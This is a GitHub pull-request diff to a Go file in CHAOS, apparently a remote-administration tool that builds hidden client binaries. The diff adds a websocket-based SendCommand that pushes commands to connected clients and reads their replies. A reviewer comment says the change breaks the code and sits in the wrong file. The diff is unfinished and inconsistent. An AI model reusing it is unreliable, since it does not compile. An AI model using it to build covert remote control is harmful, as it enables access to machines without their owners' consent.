services/client/client.go

```diff
@@ -2,44 +2,67 @@ package client
 
 import (
 	"context"
+	"errors"
 	"github.com/gorilla/websocket"
 	"github.com/tiagorlampert/CHAOS/internal/utils"
 	"github.com/tiagorlampert/CHAOS/internal/utils/system"
+	"sync"
 )
 
-type SendCommandInput struct {
-	ClientID  string
-	Command   string
-	Parameter string
-	Request   string
-}
+// Author: Viru
+// Email: viru@gmail.com
 
-type SendCommandOutput struct {
-	Response string
+type Service struct {
+	connections map[string]*websocket.Conn
+	mu          sync.Mutex
 }
 
-type BuildClientBinaryInput struct {
-	ServerAddress, ServerPort, Filename string
-	RunHidden                           bool
-	OSTarget                            system.OSType
+func (s *Service) AddConnection(clientID string, conn *websocket.Conn) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	s.connections[clientID] = conn
+	return nil
 }
 
-func (b BuildClientBinaryInput) GetServerAddress() string {
-	return utils.SanitizeUrl(b.ServerAddress)
+func (s *Service) GetConnection(clientID string) (*websocket.Conn, bool) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	conn, exists := s.connections[clientID]
+	return conn, exists
 }
 
-func (b BuildClientBinaryInput) GetServerPort() string {
-	return utils.SanitizeUrl(b.ServerPort)
+func (s *Service) RemoveConnection(clientID string) error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if conn, exists := s.connections[clientID]; exists {
+		err := conn.Close()
+		delete(s.connections, clientID)
+		return err
+	}
+	return errors.New("connection not found")
 }
 
-func (b BuildClientBinaryInput) GetFilename() string {
-	return utils.SanitizeString(b.Filename)
-}
+func (s *Service) SendCommand(ctx context.Context, input SendCommandInput) (SendCommandOutput, error) {
+	conn, exists := s.GetConnection(input.ClientID)
+	if !exists {
+		return SendCommandOutput{}, errors.New("client not connected")
+	}
+	defer func() {
+		if err := conn.Close(); err != nil {
+			// Log error if needed
+		}
+	}()
+
+	if err := conn.WriteMessage(websocket.TextMessage, []byte(input.Command)); err != nil {
+		s.RemoveConnection(input.ClientID)
+		return SendCommandOutput{}, err
+	}
+
+	_, message, err := conn.ReadMessage()
+	if err != nil {
+		s.RemoveConnection(input.ClientID)
+		return SendCommandOutput{}, err
+	}
 
-type Service interface {
```

Comment:
Hi @Virendrapro 

The code are breaking.  Looks like you remove something wrong.

The new code are in the wrong file. Note that the client connection implementation is in the file https://github.com/tiagorlampert/CHAOS/blob/main/client/app/handler/handler.go#L40v